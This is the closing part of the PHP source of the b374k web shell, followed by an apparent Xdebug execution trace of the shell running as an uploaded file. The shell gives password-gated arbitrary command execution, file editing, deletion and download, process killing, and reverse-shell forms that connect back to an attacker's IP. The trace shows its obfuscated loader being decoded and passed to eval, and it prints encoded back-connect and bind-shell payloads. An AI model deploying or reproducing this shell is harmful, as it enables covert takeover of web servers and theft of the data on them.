$s_result .= "<div class=\"mybox\"><h2>Reverse shell ( python )</h2>\r\n <form action=\"?rs\" method=\"post\" />\r\n <table class=\"myboxtbl\">\r\n <tr><td style=\"width:100px;\">Your IP</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"rstarget2\" value=\"" . $rstarget2 . "\" /></td></tr>\r\n <tr><td>Port</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlportb2\" value=\"" . $rsportb2 . "\" /></td></tr>\r\n </table>\r\n <input type=\"submit\" name=\"xback_py\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />\r\n <span id=\"rs1\">" . $rspesanb . "</span>\r\n <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />\r\n </form>\r\n </div>";
$s_result .= "<div class=\"mybox\"><h2>Reverse shell ( bin )</h2>\r\n <form action=\"?rs\" method=\"post\" />\r\n <table class=\"myboxtbl\">\r\n <tr><td style=\"width:100px;\">Your IP</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"rstarget3\" value=\"" . $rstarget3 . "\" /></td></tr>\r\n <tr><td>Port</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlportb3\" value=\"" . $rsportb3 . "\" /></td></tr>\r\n </table>\r\n <input type=\"submit\" name=\"xback_bin\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />\r\n <span id=\"rs1\">" . $rspesanb . "</span>\r\n <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />\r\n </form>\r\n </div>";
$s_result .= "<div class=\"mybox\"><h2>Reverse shell ( php )</h2>\r\n <form action=\"?rs\" method=\"post\" />\r\n <table class=\"myboxtbl\">\r\n <tr><td style=\"width:100px;\">Your IP</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"rstarget4\" value=\"" . $rstarget4 . "\" /></td></tr>\r\n <tr><td>Port</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"sqlportb4\" value=\"" . $rsportb4 . "\" /></td></tr>\r\n </table>\r\n <input type=\"submit\" name=\"xback_php\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />\r\n <span id=\"rs1\">" . $rspesanb . "</span>\r\n <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />\r\n </form>\r\n </div>";
} elseif (isset($_REQUEST['view'])) {
$f = ss($_REQUEST['view']);
if (isset($fnew) && trim($fnew) != "") {
$f = $fnew;
}
if (is_file($f)) {
if (!$s_win && $s_posix) {
$name = posix_getpwuid(fileowner($f));
$group = posix_getgrgid(filegroup($f));
$owner = $name['name'] . "<span class=\"gaya\"> : </span>" . $group['name'];
} else {
$owner = $s_user;
}
$filn = basename($f);
$s_result .= "<table class=\"viewfile\">\r\n <tr><td>Filename</td><td><span id=\"" . cs($filn) . "_link\">" . $f . "</span>\r\n <form action=\"?d=" . $pwd . "&view=" . $f . "\" method=\"post\" id=\"" . cs($filn) . "_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">\r\n <input type=\"hidden\" name=\"oldname\" value=\"" . $filn . "\" style=\"margin:0;padding:0;\" />\r\n <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"" . $filn . "\" />\r\n <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />\r\n <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"\r\n onclick=\"tukar('" . cs($filn) . "_link','" . cs($filn) . "_form');\" />\r\n </form>\r\n </td></tr>\r\n <tr><td>Size</td><td>" . gs($f) . "</td></tr>\r\n <tr><td>Permission</td><td>" . gp($f) . "</td></tr>\r\n <tr><td>Owner</td><td>" . $owner . "</td></tr>\r\n <tr><td>Create time</td><td>" . date("d-M-Y H:i", filectime($f)) . "</td></tr>\r\n <tr><td>Last modified</td><td>" . date("d-M-Y H:i", filemtime($f)) . "</td></tr>\r\n <tr><td>Last accessed</td><td>" . date("d-M-Y H:i", fileatime($f)) . "</td></tr>\r\n <tr><td>Actions</td><td>\r\n <a href=\"?d=" . $pwd . "&edit=" . $f . "\">edit</a> |\r\n <a href=\"javascript:tukar('" . cs($filn) . "_link','" . cs($filn) . "_form');\">rename</a> |\r\n <a href=\"?d=" . $pwd . "&delete=" . $f . "\">delete</a> |\r\n <a href=\"?d=" . $pwd . "&dl=" . $f . "\">download</a> (<a href=\"?d=" . $pwd . "&dlgzip={$f}\">gzip</a>)</td></tr>\r\n <tr><td>View</td><td>\r\n <a href=\"?d=" . $pwd . "&view=" . $f . "&type=text\">text</a> |\r\n <a href=\"?d=" . $pwd . "&view=" . $f . "&type=code\">code</a> |\r\n <a href=\"?d=" . $pwd . "&view=" . $f . "&type=image\">image</a></td></tr>\r\n </table>\r\n ";
$t = "";
$iinfo = getimagesize($f);
if (substr($filn, -3, 3) == "php") {
$t = "code";
}
if (is_array($iinfo)) {
$t = 'image';
}
if (isset($_REQUEST['type'])) {
$t = ss($_REQUEST['type']);
}
if ($t == "image") {
$width = (int) $iinfo[0];
$height = (int) $iinfo[1];
$imginfo = "Image type = ( " . $iinfo['mime'] . " )<br />\r\n Image Size = <span class=\"gaul\">( </span>" . $width . " x " . $height . "<span class=\"gaul\"> )</span><br />";
if ($width > 800) {
$width = 800;
$imglink = "<p><a href=\"?d=" . $pwd . "&img=" . $filn . "\" target=\"_blank\">\r\n <span class=\"gaul\">[ </span>view full size<span class=\"gaul\"> ]</span></a></p>";
} else {
$imglink = "";
}
$s_result .= "<div class=\"viewfilecontent\" style=\"text-align:center;\">" . $imglink . "\r\n <img width=\"" . $width . "\" src=\"?d=" . $pwd . "&img=" . $filn . "\" alt=\"\" style=\"margin:8px auto;padding:0;border:0;\" /></div>";
} elseif ($t == "code") {
$s_result .= "<div class=\"viewfilecontent\">";
$file = wordwrap(file_get_contents($f), "240", "\n");
$buff = highlight_string($file, true);
$old = array("0000BB", "000000", "FF8000", "DD0000", "007700");
$new = array("4C83AF", "888888", "87DF45", "EEEEEE", "FF8000");
$buff = str_replace($old, $new, $buff);
$s_result .= $buff;
$s_result .= "</div>";
} else {
$s_result .= "<div class=\"viewfilecontent\">";
$s_result .= nl2br(htmlentities(file_get_contents($f)));
$s_result .= "</div>";
}
} elseif (is_dir($f)) {
chdir($f);
$pwd = cp(getcwd());
$s_result .= showdir($pwd, $s_prompt, $s_win);
}
} elseif (isset($_REQUEST['edit'])) {
$f = ss($_REQUEST['edit']);
$fc = "";
$fcs = "";
if (is_file($f)) {
$fc = file_get_contents($f);
}
if (isset($_REQUEST['fcsubmit'])) {
$fc = ssc($_REQUEST['fc']);
if ($filez = fopen($f, "w")) {
$time = date("d-M-Y H:i", time());
if (fwrite($filez, $fc)) {
$fcs = "file saved <span class=\"gaya\">@</span> " . $time;
} else {
$fcs = "failed to save";
}
fclose($filez);
} else {
$fcs = "permission denied";
}
}
$s_result .= " <form action=\"?\" method=\"post\">\r\n <textarea id=\"fc\" name=\"fc\" class=\"evalcode\">" . htmlspecialchars($fc) . "</textarea>\r\n <p><input type=\"text\" class=\"inputz\" style=\"width:98%;\" name=\"edit\" value=\"" . $f . "\" /></p>\r\n <p><input type=\"submit\" name=\"fcsubmit\" class=\"inputzbut\" value=\"Save !\" style=\"width:120px;height:30px;\" />\r\n " . $fcs . "</p>\r\n <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />\r\n </form>\r\n ";
} elseif (isset($_REQUEST['ps'])) {
$s_result = "<table class=\"explore sortable\">";
if (!$s_win) {
$h = "ps -aux";
} else {
$h = "tasklist /V /FO csv";
}
$wcount = 11;
$wexplode = " ";
if ($s_win) {
$wexplode = "\",\"";
}
$res = exe($h);
if (trim($res) == '') {
$s_result .= "<p class=\"rs_result\">error: permission denied</p>";
} else {
if (!$s_win) {
$res = preg_replace('#\\ +#', ' ', $res);
}
$psarr = explode("\n", $res);
$fi = true;
$tblcount = 0;
$check = explode($wexplode, $psarr[0]);
$wcount = count($check);
foreach ($psarr as $psa) {
if (trim($psa) != '') {
if ($fi) {
$fi = false;
$psln = explode($wexplode, $psa, $wcount);
$s_result .= "<tr><th>action</th>";
foreach ($psln as $p) {
$s_result .= "<th>" . trim(trim(strtolower($p)), "\"") . "</th>";
}
$s_result .= "</tr>";
} else {
$psln = explode($wexplode, $psa, $wcount);
$s_result .= "<tr>";
$tblcount = 0;
foreach ($psln as $p) {
if (trim($p) == "") {
$p = " ";
}
if ($tblcount == 0) {
$s_result .= "<td style=\"text-align:center;\"><a href=\"?ps&d=" . $pwd . "&pid=" . trim(trim($psln[1]), "\"") . "\">kill</a></td>\r\n <td style=\"text-align:center;\">" . trim(trim($p), "\"") . "</td>";
$tblcount++;
} else {
$tblcount++;
if ($tblcount == count($psln)) {
$s_result .= "<td style=\"text-align:left;\">" . trim(trim($p), "\"") . "</td>";
} else {
$s_result .= "<td style=\"text-align:center;\">" . trim(trim($p), "\"") . "</td>";
}
}
}
$s_result .= "</tr>";
}
}
}
$s_result .= "</table>";
}
} else {
if (isset($_REQUEST['cmd'])) {
$cmd = ss($_REQUEST['cmd']);
if (strlen($cmd) > 0) {
if (preg_match('#^cd(\\ )+(.*)$#', $cmd, $r)) {
$nd = trim($r[2]);
if (is_dir($nd)) {
chdir($nd);
$pwd = cp(getcwd());
$s_result .= showdir($pwd, $s_prompt, $s_win);
} elseif (is_dir($pwd . $nd)) {
chdir($pwd . $nd);
$pwd = cp(getcwd());
$s_result .= showdir($pwd, $s_prompt, $s_win);
} else {
$s_result .= "<pre>" . $nd . " is not a directory" . "</pre>";
}
} else {
$s_r = htmlspecialchars(exe($cmd));
if ($s_r != '') {
$s_result .= "<pre>" . $s_r . "</pre>";
} else {
$s_result .= showdir($pwd, $s_prompt, $s_win);
}
}
} else {
$s_result .= showdir($pwd, $s_prompt, $s_win);
}
} else {
$s_result .= showdir($pwd, $s_prompt, $s_win);
}
}
$s_info = "<table class=\"headtbl\"><tr><td>" . $s_software . "</td></tr>";
$s_info .= "<tr><td>" . $s_system . "</td></tr>";
if ($s_id != "") {
$s_info .= "<tr><td>" . $s_id . "</td></tr>";
}
$s_info .= "<tr><td>server ip : " . $s_server_ip . "<span class=\"gaya\"> | </span>your ip : " . $s_my_ip . "<span class=\"gaya\"> | </span>";
if ($s_safemode) {
$s_info .= "safemode <span class=\"gaya\">ON</span>";
} else {
$s_info .= "safemode <span class=\"gaya\">OFF</span>";
}
$s_info .= "\r\n </td></tr>\r\n <tr><td style=\"text-align:left;\">\r\n <table class=\"headtbls\"><tr>\r\n <td>" . trim($letters) . "</td>\r\n <td>\r\n <span id=\"chpwd\"> <a href=\"javascript:tukar('chpwd','chpwdform');\">> </a>" . swd($pwd) . "</span>\r\n <form action=\"?\" method=\"get\" style=\"margin:0;padding:0;\">\r\n <span class=\"sembunyi\" id=\"chpwdform\">\r\n <a href=\"javascript:tukar('chpwdform','chpwd');\">></a> \r\n <input type=\"hidden\" name=\"d\" class=\"inputz\" style=\"width:300px;\" value=\"" . cp($pwd) . "\" />\r\n <input type=\"text\" name=\"view\" class=\"inputz\" style=\"width:300px;\" value=\"" . $pwd . "\" />\r\n <input class=\"inputzbut\" type=\"submit\" name=\"submit\" value=\"view\" />\r\n <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('chpwdform','chpwd');\" />\r\n </form>\r\n </span>\r\n </td></tr>\r\n </table>\r\n </td></tr>\r\n </table>";
}
?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title><?php
echo $s_title;
?></title>
<link rel="SHORTCUT ICON" href="<?php
echo $_SERVER['SCRIPT_NAME'] . "?favicon";
?>" />
<style type="text/css"><?php
echo gzinflate(base64_decode($style));
?></style>
<script type="text/javascript" src="<?php
echo $_SERVER['SCRIPT_NAME'] . "?sorttable";
?>"></script>
<script type="text/javascript">
function tukar(l,b){
if(document.getElementById(l)) document.getElementById(l).style.display = 'none';
if(document.getElementById(b)) document.getElementById(b).style.display = 'block';
}
function init(){
<?php
if (isset($_REQUEST['cmd'])) {
echo "if(document.getElementById('cmd')) document.getElementById('cmd').focus();";
}
?>
}
</script>
</head>
<body onLoad="init();">
<table id="main"><tr><td><?php
if ($s_auth) {
?>
<div><table id="header"><tr><td><table><tr><td><h1><a href="?"><?php
echo $s_name;
?></a></h1></td></tr><tr><td style="text-align:right;"><div class="ver"><?php
echo $s_ver;
?></div></td></tr></table></td>
<td><div class="headinfo"><?php
echo $s_info;
?></div></td></tr></table>
</div>
<div style="clear:both;"></div>
<div id="menu">
<table style="width:100%;"><tr>
<td><a href="?&d=<?php
echo $pwd;
?>" title="Explorer"><div class="menumi">xpl</div></a></td>
<td><a href="?ps&d=<?php
echo $pwd;
?>" title="Display process status"><div class="menumi">ps</div></a></td>
<td><a href="?eval&d=<?php
echo $pwd;
?>" title="PHP eval function"><div class="menumi">eval</div></a></td>
<td><a href="?phpinfo&d=<?php
echo $pwd;
?>" title="Information about current state of PHP"><div class="menumi">php</div></a></td>
<td><a href="?db&d=<?php
echo $pwd;
?>" title="Connect to database"><div class="menumi">db</div></a></td>
<td><a href="?rs&d=<?php
echo $pwd;
?>" title="Remote Shell"><div class="menumi">rs</div></a></td>
<td style="width:100%;padding:0 0 0 6px;">
<form action="?" method="get"><span class="prompt"><?php
echo $s_prompt;
?></span>
<input id="cmd" class="inputz" type="text" name="cmd" style="width:70%;" value="" />
<noscript><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:80px;" /></noscript>
<input type="hidden" name="d" value="<?php
echo $pwd;
?>" />
</form>
</td>
</tr>
</table>
</div>
<div id="content" id="box_shell">
<div id="result"><?php
echo $s_result;
?></div>
</div><?php
} else {
?>
<div style="width:100%;text-align:center;">
<form action="?" method="post">
<img src="?favicon" style="margin:2px;vertical-align:middle;" />
<?php
echo $s_name;
?> <span class="gaya"><?php
echo $s_ver;
?></span><input id="login" class="inputz" type="password" name="login" style="width:120px;" value="" />
<input class="inputzbut" type="submit" value="Go !" name="submitlogin" style="width:80px;" />
</form>
</div>
<?php
}
?>
</td></tr></table>
<p class="footer">Jayalah Indonesiaku ©<?php
echo date("Y", time()) . " " . $s_name;
?></p>
</body>
</html>
<?php
};Execution traces
data/traces/0421445303cfd0ec6bc20b3846e30ff0_trace-1676251163.5347.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:19:49.432563]
1 0 1 0.000170 393512
1 3 0 0.000401 426632 {main} 1 /var/www/html/uploads/bbbbb.php 0 0
1 A /var/www/html/uploads/bbbbb.php 10 $s_pass = '2cf1656ed3df6864df08feaf603ebe13'
2 4 0 0.000434 426632 base64_decode 0 /var/www/html/uploads/bbbbb.php 12 1 '7b1pl9vGtSj6/a51/wPDqxd1hy1hIDjAsuQDEuBMcB5AJ1cLM0CMxAzm5r+/KgBks5vslmwpdo6PnRU1WMPeu\n3btqeYff3I193//r5LseY732ZNdxwt0W71D7z+U/suXg8+BbsmfTd3Sgyztjf/Z5i259LFUFqoNwihnSZHswRT8PZb/DvTAhGWK0u/LpfL7vFiWzYeBBnIV3\nvTlDyVdufMDz5Ttu8DTrTuQ7/K+f3//Cb3/J8zUfUDH3ZvP7clk2Gd+fpvhffuP+zwXVA0c04ll71n10sePpavMayD3FwQFXgjo+dcl0jkzWzGL5c9vTUfV7\nRzrm+y7dAv8dfEPXyTSkmp3OUgIHKAVHcfQ5buCwQ8X+Q+wN+7uS5VStY6if8OJvzVgn1iQ1Z8XzHzNzH9+u2jP+9PlZ5YaM2//8aGkybwE8JZHjsgHumP/A\nPvCAtVgo+/AXwnguofNlkF33CIgR37C/e574D7j/FeB96oX3iQCLxqfXbP0'
2 4 1 0.000556 459432
2 4 R '�i��Ƶ(���u�\003ë\027u�-a 8���\003\022�Lp\036@\'W\v3@��\f�濿*\000d���l)v���\0255X�v��\037r5�����y��ٓ]�\vt[�C�?��˗�ρnɟM�҃,���-��T\026�\r�(gI��\024�=��\016�e���˥�X�͇�\006r\025���\017%]��\003ϔ�ӭ;����\t��\'��}@�ݛ���d�g~~��}���<\027T\r\034Ӊe�Y��Ǐ���k �\027\004\005^\b��%�93[1���oMG��\034��t\v�u�\017_$Ғjw9H\b\034�\025\035��廂�\017\027�\017�7��K�R���É�5`�X�՟\027�|��~�h���g�\0323o��ɼ\004�G��\a�c�\000��\002�`��_\tງ͖Aw�" G~��{�>�W���\027�$\002/\032�]��,�:ʒ\030ǝ�'
2 5 0 0.000998 459400 gzinflate 0 /var/www/html/uploads/bbbbb.php 12 1 '�i��Ƶ(���u�\003ë\027u�-a 8���\003\022�Lp\036@\'W\v3@��\f�濿*\000d���l)v���\0255X�v��\037r5�����y��ٓ]�\vt[�C�?��˗�ρnɟM�҃,���-��T\026�\r�(gI��\024�=��\016�e���˥�X�͇�\006r\025���\017%]��\003ϔ�ӭ;����\t��\'��}@�ݛ���d�g~~��}���<\027T\r\034Ӊe�Y��Ǐ���k �\027\004\005^\b��%�93[1���oMG��\034��t\v�u�\017_$Ғjw9H\b\034�\025\035��廂�\017\027�\017�7��K�R���É�5`�X�՟\027�|��~�h���g�\0323o��ɼ\004�G��\a�c�\000��\002�`��_\tງ͖Aw�" G~��{�>�W���\027�$\002/\032�]��,�:ʒ\030ǝ�'
2 5 1 0.001634 533160
2 5 R '<?php\r\n error_reporting(0); @set_time_limit(0); $s_name = "b374k"; $s_ver = "2.1"; $s_title = $s_name." ".$s_ver; $s_auth = false; if(strlen(trim($s_pass))>0){ if(isset($_COOKIE[\'b374k\'])){ if(strtolower(trim($s_pass)) == strtolower(trim($_COOKIE[\'b374k\']))) $s_auth = true; } if(isset($_REQUEST[\'login\'])){ $login = strtolower(trim($_REQUEST[\'login\'])); if(strtolower(trim($s_pass)) == md5($login)){ setcookie("b374k",md5($login),time() + 3600*24*7); $m = $_SERVER[\'SCRIPT_NAME\']; header("Location: '
2 6 0 0.003671 893064 eval 1 '?><?php\r\n error_reporting(0); @set_time_limit(0); $s_name = "b374k"; $s_ver = "2.1"; $s_title = $s_name." ".$s_ver; $s_auth = false; if(strlen(trim($s_pass))>0){ if(isset($_COOKIE[\'b374k\'])){ if(strtolower(trim($s_pass)) == strtolower(trim($_COOKIE[\'b374k\']))) $s_auth = true; } if(isset($_REQUEST[\'login\'])){ $login = strtolower(trim($_REQUEST[\'login\'])); if(strtolower(trim($s_pass)) == md5($login)){ setcookie("b374k",md5($login),time() + 3600*24*7); $m = $_SERVER[\'SCRIPT_NAME\']; header("Location: ".$m); auth(); die(); } else{ setcookie("b374k",$login,time() - 3600*24*7); $m = $_SERVER[\'SCRIPT_NAME\']; header("Location: ".$m); die(); } } } else $s_auth = true; $xback_pl ="dZFfT4MwFMXf+RQVmSvJEuYzqcmCaJZlYwH0xT+EwVUbR0vaLmZx87PblqnEbG/33HPOL7dwfhZspAhWlAUtiLWzkYAyXr2DCh2PS0SQ95zoUW6lgoa4Ninf3NChL9gGvlATfOgl9T/Rb2wQJfNsGUcDFMzccO94Y+JVTa1BqhSvoIg3SW/vHy6f9Kbl4kePjaZlXQtCGaiiVJzhQ8VHux2qKWAXhODikbm+Kduw1BeboaA6bngj1GFOlARXnGimHVZbVjaAh6pqh9qV9vU4S6JZnI/Q8qaYLsxgFkWWp/Fkrum2eZReccag+gN0Jx6N8hYYzvLr6WKE3KuLrtE3krv8hBOn6T+n+/T48AvMIWsuocP3lWb2pQZp+Q0="; $xbind_pl ="bZFvS8MwEMbf51PcYre1UKjiy1pxdFXHtnY0VRD/lNneNFiT0maozPnZTYpTEd+F537P5e65vZ63bhvvnguvxqYilmwhAOsu8YnFzqPZLKBdsX2kPuEru6t/wLP3okXubGBH9cNkzhZR2AdvSv2tZsE+GaVnl3AEBw5sAF+5sg8cH7bEmk1YFsX5IkmzwDLQ9f6tT9YtApPFEyr9ed1IJQtZBQ+ouvf9m1g+oz1URT10fNJ2oM3cweI0n8RR5g5YEk5zlqXRaO5++x14f4eSo02xaWRzI6gxozJ+WZsGLJnlxqpbsCRPowsWjcbj1NWzEr16qREDL8uyybmwfw/vTmKD5qP4yvn3o4q3CoXucLgrA9VBvjzyCnUYZEOWRYF6jDCJY5c5XcY926p5Gaxk8+QYpHOFSyGkAiNSMOH2SlxxgSUYWBtljQJYNp7ELj0amH70R0wuMpce/1WjNP2l4isWX+f8b5Wikvo+hjUoV7Dvky3ZfgI="; $xback_c = "XVFNawIxEL0L/odhhZJocF2v2oKIBSmtontrZVmTbDd0TSSJxQ/8702y1loPSWbmvXkzvLSEpNWOcRgay4Tqlk/NRuuvdjCxUfSL2ztAcivciYUMgJAWNrmQyAe5/qQEaJlraLv4+32FTzWlYINmw1i9oxa8bM6YzoQEI6QDWM43SqKE9LCnOWl3siLfiOoAjzB6zqZvk/QG2iptHVBaJQ3KrRIojEtW+FbAD+ma8Diy3zrENbe/8tT1kWv1WyBuwYrLK95JOreVi3rBnFhtDbpsRmA5G79ky3QxGb0SmM7ni1k6y9LxHIPrEAUgRJWUnFpUMALozgloY3hwGxPnx5Gr4h7HGA97+LTlWiuNovB8yAgP+F5Y5Ew7Ow93234QDx5es+Rf1vcZ33NaoSheCxmbMiKRv1D9azh000oZ7hp8fP4B"; $xbind_c = "dVJhS+QwEP0u+B9yFW6Ttex2BT/1erCcCiK3B+oXUSkxSe1gNylJVl0W//tNmha0KrRJ5r2XzMtMDkCLZiMV+eW8BDOrf+/vHbzDLOjHMbh1c79tlfsCd0Y8KT8itPKA/xz0iFDW6pgStCdrDppy+yhSHJ5ZBEOc7++JmlsynQYi30UmpKpkSrR6qSRK0OtGRJhLaUvQxKq18Qo5qGhl7BNlpChIxggeEbmZA11WfA3NlhRkeVaer06v8w9sa6xHrvZGO8q9geDx+XZxz9hHYcg6c93U6xt6vlqenFyWy9VNEEfLSMYy0T5fevXvz0V5dX15uvybZiz6/RHFjLRYJWNp0k13Ogn8A2hJ+wLQ0cXJlP2MrlKSvS668xpwXulhx3GAXmpoFF0wLEVXwYILoVo/aLJoRG7aI9rxn+LFKD4KsXpVoqHJHA3OXZ2kSRho7B7rThCNcSpuCeHb8IWWirrlzvXyB+7wBnGttFdWSda3HnAj9pNCkeUQHmmDlxs0ORwe4uPZdVXswVu4D52f3OkJUu9BxLJJ/qXWfqcNbiuCHfJWrFvaGR2ys/Ak/MZqkgXlfw=="; $xmulti_py = "lVNda9swFH22wf9B9R4qk9T56PYS0CCMlJYlzWgyGHQjuLZSizqSkZS2+ffVvbKb0GSM5SHWx9E5514dfTrrbY3uPQjZ4/KZ1DtbKhmFYlMrbYkyXWJ28KfyJ267xIoNj8LZ+NdqOrllg/7wcxQurifTKYuR4yEzJbnI4yhc3swmq/nPJbvs96Pwx/xuyWK3fD1f+EHB18SUvKpovimSURQGplyprWXKpLWquaTI24lJ3AFEqnlWVEJyQxMHlg0aqIK10kQQIYnO5COnlTvstxMkbsEd5r/34o9b1dxutSTNnjeU5VYoSXMlJZ58KUXFyVJvOfJYvcNvUDtHDFDOVf5Mm36Ar4C/5ry2DUwLaWnMtVb6t4xxv9UFUsRXxpMHwInlBKcKAsnkYuALQnCHwZovxv3EmgADi0dFHjeoj2Igt8eZ4iPuKnNuWmDrC6nBAjj42m8XA2j//gbbVeyK4bKg0P8ozPTjM3MZSmHgguWpYJIwNgQyzAYs3A9cKWjwAHJ5DAkwRDgd4gnnlPBXYekgaaIGfYdBgoouUq6jTzQ5Y2gf7CC+7/Yh2sznO/Uf2szGV6ub28myTX+6mH/7vlos7ybjWXPOFWrhSbhSaRv45GSRiHYvpKD0vFJ5VpXK2PMuQZNJC6iEse4g2NJbyfy1+RC6OfCcaA7GEj2m0HyeW0qhQwfk/04lVJGaivOafknecwmqrHkUIAA778EA2QDfSjcrCp1gE9MsByX636qD06r4FI/qHo6Iz1m5tYV6kXR45Iw09+M6HseHbshfRD1+T/gG"; $wmulti_c = "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